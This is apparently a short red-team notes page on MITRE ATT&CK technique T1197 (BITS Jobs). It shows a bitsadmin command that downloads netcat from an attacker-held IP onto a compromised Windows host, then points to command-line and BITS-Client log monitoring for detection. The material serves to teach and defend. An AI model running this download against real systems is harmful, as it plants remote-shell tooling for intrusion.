description
File upload to the compromised system.

BITS Jobs

Execution

{% code title="attacker@victim" %}

bitsadmin /transfer myjob /download /priority high http://10.0.0.5/nc64.exe c:\temp\nc.exe

{% endcode %}

Observations

Commandline arguments monitoring can help discover bitsadmin usage:

Application Logs > Microsoft > Windows > Bits-Client > Operational shows logs related to jobs, which you may want to monitor as well. An example of one of the jobs:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1197" %}

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

t1197-bits-jobs.md

t1197-bits-jobs.md

BITS Jobs

Execution

Observations

References

Files

t1197-bits-jobs.md

Latest commit

History

t1197-bits-jobs.md

File metadata and controls

BITS Jobs

Execution

Observations

References